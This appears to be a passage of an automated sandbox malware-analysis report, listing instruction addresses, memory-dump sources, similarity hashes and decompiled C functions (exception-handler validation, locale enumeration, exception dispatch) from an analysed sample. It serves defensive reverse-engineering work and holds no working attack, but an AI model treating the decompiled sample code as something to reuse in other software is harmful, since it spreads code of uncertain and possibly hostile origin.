0x00dcb2a6
0x00dcb2aa
0x00dcb306
0x00dcb308
0x00dcb310
0x00dcb312
0x00dcb314
0x00000000
0x00000000
0x00dcb316
0x00dcb31c
0x00dcb31e
0x00dcb320
0x00dcb335
0x00dcb335
0x00dcb337
0x00dcb366
0x00dcb36d
0x00000000
0x00dcb36d
0x00dcb33b
0x00dcb33c
0x00dcb33e
0x00dcb340
0x00dcb340
0x00dcb342
0x00dcb344
0x00dcb346
0x00dcb35a
0x00dcb35a
0x00dcb35d
0x00dcb35f
0x00dcb35f
0x00dcb360
0x00dcb360
0x00000000
0x00dcb348
0x00dcb348
0x00dcb348
0x00dcb351
0x00dcb352
0x00dcb354
0x00dcb356
0x00dcb356
0x00000000
0x00dcb348
0x00dcb346
0x00dcb322
0x00dcb329
0x00dcb329
0x00dcb32b
0x00000000
0x00000000
0x00dcb32d
0x00dcb32e
0x00dcb331
0x00dcb333
0x00000000
0x00000000
0x00000000
0x00dcb333
0x00000000
0x00dcb329
0x00dcb2ac
0x00dcb2af
0x00dcb2b4
0x00000000
0x00000000
0x00dcb2bd
0x00dcb2bf
0x00dcb2c5
0x00000000
0x00000000
0x00dcb2cb
0x00dcb2d1
0x00000000
0x00000000
0x00dcb2d7
0x00dcb2d9
0x00dcb2e2
0x00dcb2e6
0x00000000
0x00000000
0x00dcb2ec
0x00dcb2ef
0x00dcb2f1
0x00000000
0x00000000
0x00dcb2f8
0x00dcb2fa
0x00000000
0x00000000
0x00dcb2fc
0x00dcb300
0x00000000
0x00000000
0x00000000
0x00dcb300
0x00000000
0x00000000
0x00000000
0x00dcb1eb
0x00dcb1eb
0x00dcb1eb
0x00dcb1f2
0x00000000
0x00000000
0x00dcb1f4
0x00dcb1f5
0x00dcb1f7
0x00000000
0x00000000
0x00000000
0x00dcb1f7
0x00dcb21f
0x00dcb221
0x00000000
0x00000000
0x00dcb231
0x00dcb233
0x00dcb235
0x00000000
0x00000000
0x00dcb23b
0x00dcb242
0x00dcb26e
0x00dcb26e
0x00dcb270
0x00dcb272
0x00dcb286
0x00dcb288
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb274
0x00dcb274
0x00dcb274
0x00dcb27d
0x00dcb27e
0x00dcb280
0x00dcb282
0x00dcb282
0x00000000
0x00dcb274
0x00dcb244
0x00dcb244
0x00dcb247
0x00dcb249
0x00dcb25b
0x00dcb25b
0x00dcb25e
0x00dcb260
0x00dcb260
0x00dcb261
0x00dcb261
0x00dcb267
0x00dcb267
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb24b
0x00dcb24b
0x00dcb24b
0x00dcb252
0x00000000
0x00000000
0x00dcb254
0x00dcb254
0x00dcb255
0x00000000
0x00000000
0x00000000
0x00dcb255
0x00dcb257
0x00dcb259
0x00dcb26c
0x00000000
0x00000000
0x00000000
0x00dcb26c
0x00000000
0x00dcb259
0x00dcb1cb
0x00dcb1ce
0x00dcb1d1
0x00000000
0x00000000
0x00dcb1d3
0x00dcb1d5
0x00000000
0x00000000
0x00000000
0x00dcb1d5
0x00dcb19a
0x00dcb19c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DCB20A

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 4d49e436d1e03bdf762aa41d616c010f7886ccecd44deeb04179bc0a6f250e85
Instruction ID: 7d78c200b4f6ecb224308c379c6672c1f0119a577560bcb8e9d1c9a0a8921e56
Opcode Fuzzy Hash: 4d49e436d1e03bdf762aa41d616c010f7886ccecd44deeb04179bc0a6f250e85
Instruction Fuzzy Hash: A16192306007479BDB19CE29C992F69B3A2EB45374F2C863ED845DB294E731DD42CA74

Uniqueness

Uniqueness Score: -1.00%

Function 702523C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702523C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x70254178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x702541c0 = 1;
										__eflags =  *0x702541c0;
										if( *0x702541c0 != 0) {
											goto L60;
										}
										_t84 =  *0x70254178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x702541c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x70254178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x70254180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x7025417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x702541c0 = 1;
							__eflags =  *0x702541c0;
							if( *0x702541c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x702541c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x70254180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x70254178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x702523cf
0x702523d2
0x702523d8
0x702523f6
0x00000000
0x702523f6
0x702523e0
0x702523e9
0x702523ef
0x702523fe
0x70252401
0x70252404
0x7025240e
0x7025240e
0x70252410
0x70252413
0x70252415
0x70252415
0x70252417
0x7025241a
0x00000000
0x00000000
0x7025241c
0x7025241e
0x70252484
0x70252484
0x702525e2
0x00000000
0x702525e2
0x70252420
0x70252420
0x70252424
0x70252426
0x70252426
0x70252426
0x70252426
0x70252429
0x7025242a
0x7025242d
0x7025242d
0x70252431
0x70252435
0x70252443
0x70252443
0x7025244b
0x70252451
0x70252453
0x70252455
0x70252465
0x70252472
0x70252476
0x7025247b
0x7025247d
0x702524fb
0x702524fb
0x7025247f
0x7025247f
0x7025247f
0x702524fd
0x702524ff
0x702525e0
0x702525e0
0x00000000
0x70252505
0x70252505
0x7025250c
0x00000000
0x00000000
0x70252512
0x70252516
0x70252572
0x70252574
0x7025257c
0x7025257e
0x70252580
0x00000000
0x00000000
0x70252582
0x70252588
0x7025258a
0x7025258c
0x702525a1
0x702525a1
0x702525a3
0x702525d2
0x702525d9
0x00000000
0x702525d9
0x702525a7
0x702525a8
0x702525aa
0x702525ac
0x702525ac
0x702525ae
0x702525b0
0x702525b2
0x702525c6
0x702525c6
0x702525c9
0x702525cb
0x702525cb
0x702525cc
0x702525cc
0x00000000
0x702525b4
0x702525b4
0x702525b4
0x702525bd
0x702525be
0x702525c0
0x702525c2
0x702525c2
0x00000000
0x702525b4
0x702525b2
0x7025258e
0x70252595
0x70252595
0x70252597
0x00000000
0x00000000
0x70252599
0x7025259a
0x7025259d
0x7025259f
0x00000000
0x00000000
0x00000000
0x7025259f
0x00000000
0x70252595
0x70252518
0x7025251b
0x70252520
0x00000000
0x00000000
0x70252529
0x7025252b
0x70252531
0x00000000
0x00000000
0x70252537
0x7025253d
0x00000000
0x00000000
0x70252543
0x70252545
0x7025254e
0x70252552
0x00000000
0x00000000
0x70252558
0x7025255b
0x7025255d
0x00000000
0x00000000
0x70252564
0x70252566
0x00000000
0x00000000
0x70252568
0x7025256c
0x00000000
0x00000000
0x00000000
0x7025256c
0x00000000
0x00000000
0x00000000
0x70252457
0x70252457
0x70252457
0x7025245e
0x00000000
0x00000000
0x70252460
0x70252461
0x70252463
0x00000000
0x00000000
0x00000000
0x70252463
0x7025248b
0x7025248d
0x00000000
0x00000000
0x7025249d
0x7025249f
0x702524a1
0x00000000
0x00000000
0x702524a7
0x702524ae
0x702524da
0x702524da
0x702524dc
0x702524de
0x702524f2
0x702524f4
0x00000000
0x00000000
0x00000000
0x00000000
0x702524e0
0x702524e0
0x702524e0
0x702524e9
0x702524ea
0x702524ec
0x702524ee
0x702524ee
0x00000000
0x702524e0
0x702524b0
0x702524b3
0x702524b5
0x702524c7
0x702524c7
0x702524ca
0x702524cc
0x702524cc
0x702524cd
0x702524cd
0x702524d3
0x00000000
0x00000000
0x00000000
0x00000000
0x702524b7
0x702524b7
0x702524b7
0x702524be
0x00000000
0x00000000
0x702524c0
0x702524c0
0x702524c1
0x00000000
0x00000000
0x00000000
0x702524c1
0x702524c3
0x702524c5
0x702524d8
0x00000000
0x00000000
0x00000000
0x702524d8
0x00000000
0x702524c5
0x70252437
0x7025243a
0x7025243d
0x00000000
0x00000000
0x7025243f
0x70252441
0x00000000
0x00000000
0x00000000
0x70252441
0x70252406
0x70252408
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 70252476

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 59a127ab8cd0c1548f55e35f948e02c15b31d3e3c5c61c45683f545d04c6d1c7
Instruction ID: eda3d13907c31daf9b245ffd3f7bec79cbd4ba5fc9fb6ecbc4457250b10c9739
Opcode Fuzzy Hash: 59a127ab8cd0c1548f55e35f948e02c15b31d3e3c5c61c45683f545d04c6d1c7
Instruction Fuzzy Hash: 0261AF336106069FD71ACF29C89071D76BAEB86358B7480E9D807C72D4F770DDAE8A58

Uniqueness

Uniqueness Score: -1.00%

Function 702A088D, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dac76d2c2c9fe9577923899ea263fae58271abe95bf8b3241f10cc9d03487e4
Instruction ID: 255553add18244a7f833a0842206cfabbb2d09a167123736776fda216489e2d7
Opcode Fuzzy Hash: 8dac76d2c2c9fe9577923899ea263fae58271abe95bf8b3241f10cc9d03487e4
Instruction Fuzzy Hash: A44194B2804219AEDB10DF79CCC9BAEB7B9EB45300F1442DDE84DD3211DA359E948F54

Uniqueness

Uniqueness Score: -1.00%

Function 702A5223, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5277

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: aacabef2aa4e6d484b34c092d6a479d53a1892fcc6cdb9e49e1115ebed5efa6f
Instruction ID: 89ec2d6b89976dc8609193a4be31eae77ec116dbbcaa120cdfc5a0e6e2382bfd
Opcode Fuzzy Hash: aacabef2aa4e6d484b34c092d6a479d53a1892fcc6cdb9e49e1115ebed5efa6f
Instruction Fuzzy Hash: 7E217CB3610226ABDB198E25CC42BAF73A8EF04314F20407AFE02D6540EF39A9659F54

Uniqueness

Uniqueness Score: -1.00%

Function 702A4EAA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

EnumSystemLocalesW.KERNEL32(702A4FD0,00000001,00000000,?,-00000050,?,702A55FE,00000000,?,?,?,00000055,?), ref: 702A4F1C

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 392e12f7921252c43087e079c211c6e4a5589ea9201b869fcae66cdc38396fe1
Instruction ID: a973b1cfac2d5c66febbfc76e1b3b51d90a90531a0b57c2f9d2cbf414e999ca4
Opcode Fuzzy Hash: 392e12f7921252c43087e079c211c6e4a5589ea9201b869fcae66cdc38396fe1
Instruction Fuzzy Hash: 8F1106772003055FD7089F39889166EB7A2FFC0318B19452DED4787A40DBB1B912CB40

Uniqueness

Uniqueness Score: -1.00%

Function 702A544F, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,702A51EC,00000000,00000000,?), ref: 702A547B

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 760022a274bc110460f4259aa2c5d6afa56d99120fd62d74b11ca57205f09c24
Instruction ID: 3cdff19f9ea86fff7fc33633e2bf09bd6a84a9123920f20e62be45b901e683e6
Opcode Fuzzy Hash: 760022a274bc110460f4259aa2c5d6afa56d99120fd62d74b11ca57205f09c24
Instruction Fuzzy Hash: 91F0F977510522AFDB144E6088067BF7778EB44355F114429ED47A3140DE78FDA1CA90

Uniqueness

Uniqueness Score: -1.00%

Function 702A4F45, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

EnumSystemLocalesW.KERNEL32(702A5223,00000001,?,?,-00000050,?,702A55C2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 702A4F8F

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 06fec2c07e4345184a75ded7c07124668cb73cef3a12ffb1b3981e0accb56fc8
Instruction ID: 21e14d57efb61d46d1987b148c9fef2aba0a04eff62480f302569ca63fda74d1
Opcode Fuzzy Hash: 06fec2c07e4345184a75ded7c07124668cb73cef3a12ffb1b3981e0accb56fc8
Instruction Fuzzy Hash: 1BF046772003045FC7145F359C85B6EBBA5EFC0328F15842DFD068BA80CAB2AC12CB10

Uniqueness

Uniqueness Score: -1.00%

Function 7029D3D7, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 7029D36B: RtlEnterCriticalSection.NTDLL(-702C0F80), ref: 7029D37A

EnumSystemLocalesW.KERNEL32(7029D3CA,00000001,702BE9C0,0000000C,7029D84C,00000000), ref: 7029D40F

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9f10f1909f93043d439102c264a066c6bd495935dad1c0d6160ad12b7442e7b8
Instruction ID: 013e6a14cbfdc6f74659ebda08889a75dc5e80c75138491375888503cd6d5011
Opcode Fuzzy Hash: 9f10f1909f93043d439102c264a066c6bd495935dad1c0d6160ad12b7442e7b8
Instruction Fuzzy Hash: 79F08C73A20600DFD700DF98D806B8D77F0FB05325F10421AF811AB290CB7569109F48

Uniqueness

Uniqueness Score: -1.00%

Function 702A4E5F, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

EnumSystemLocalesW.KERNEL32(702A4DB8,00000001,?,?,?,702A5620,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 702A4E96

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 58f76e36086b4128b68e6845166066218104ca8e01509decd48dac3319ca0747
Instruction ID: 448ede729c8cbdb6d6f9211c92f7e48c9f816b17dabcc201687588f8fbbb2e2b
Opcode Fuzzy Hash: 58f76e36086b4128b68e6845166066218104ca8e01509decd48dac3319ca0747
Instruction Fuzzy Hash: 4CF0553730020597CB049F35C809B6EBFA4EFC2320F47405AEE068B240CA72D843CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7029BA3F, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 7029BBD7

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 45bf6703caf006abf8a0f11949f7400dce47d27e331a046f6c45b86395e5ca7b
Instruction ID: b22a9549269c81c45a327de8ce2032a5b472786862a45a13a8228893e2c033fa
Opcode Fuzzy Hash: 45bf6703caf006abf8a0f11949f7400dce47d27e331a046f6c45b86395e5ca7b
Instruction Fuzzy Hash: 99614B736302076ADB178E6487A17BE73BAEF46604F10042EE843FB2C8D6649D61C75D

Uniqueness

Uniqueness Score: -1.00%

Function 7029B7DA, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 7029B972

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 6e6dd35b963990a8f7c93dd20f2b142c5e3829ef01a5b52b756a3ef116bbd0b9
Instruction ID: da7c745f6c9f9628de46c09657fb2018fa35c23defddb39de3270b3a42eea6a5
Opcode Fuzzy Hash: 6e6dd35b963990a8f7c93dd20f2b142c5e3829ef01a5b52b756a3ef116bbd0b9
Instruction Fuzzy Hash: B56159336303069ADB178E2487917BE73BEBF49600F50081DE583FB694D665AD61CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 702AA3BE, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13e76ba645a525bc4852397099c7e763f6fcf461500e36aac7eb26245ea4cd1
Instruction ID: 70329fad845e1109b68520525d1df47e14fd04f9808e62c9355f486da8c072af
Opcode Fuzzy Hash: a13e76ba645a525bc4852397099c7e763f6fcf461500e36aac7eb26245ea4cd1
Instruction Fuzzy Hash: B221B373F205394B7B0CC47E8C562BDB6E1C68C601745823AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00DCAF34, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00DCAF34(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00DCB09F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00DCB159(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00DCB044(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00DCB09F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00DCB13B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00dcaf38
0x00dcaf39
0x00dcaf3a
0x00dcaf3d
0x00dcaf3f
0x00dcaf42
0x00dcaf43
0x00dcaf45
0x00dcaf46
0x00dcaf47
0x00dcaf4a
0x00dcaf54
0x00dcb005
0x00dcb00c
0x00dcb015
0x00dcaf5a
0x00dcaf5a
0x00dcaf60
0x00dcaf66
0x00dcaf69
0x00dcaf6c
0x00dcaf70
0x00dcaf75
0x00dcaf7a
0x00dcaffa
0x00000000
0x00dcaf7c
0x00dcaf7c
0x00dcaf88
0x00dcaf8a
0x00dcafe5
0x00dcafe5
0x00dcafeb
0x00000000
0x00dcaf8c
0x00dcaf9b
0x00dcaf9d
0x00dcaf9e
0x00dcaf9f
0x00dcafa2
0x00dcafa2
0x00dcafa4
0x00000000
0x00dcafa6
0x00dcafa6
0x00dcaff0
0x00dcafa8
0x00dcafa8
0x00dcafac
0x00dcafb4
0x00dcafb9
0x00dcafbe
0x00dcafca
0x00dcafd2
0x00dcafd9
0x00dcafdf
0x00dcafe3
0x00000000
0x00dcafe3
0x00dcafa6
0x00dcafa4
0x00000000
0x00dcaf8a
0x00dcaffe
0x00dcaffe
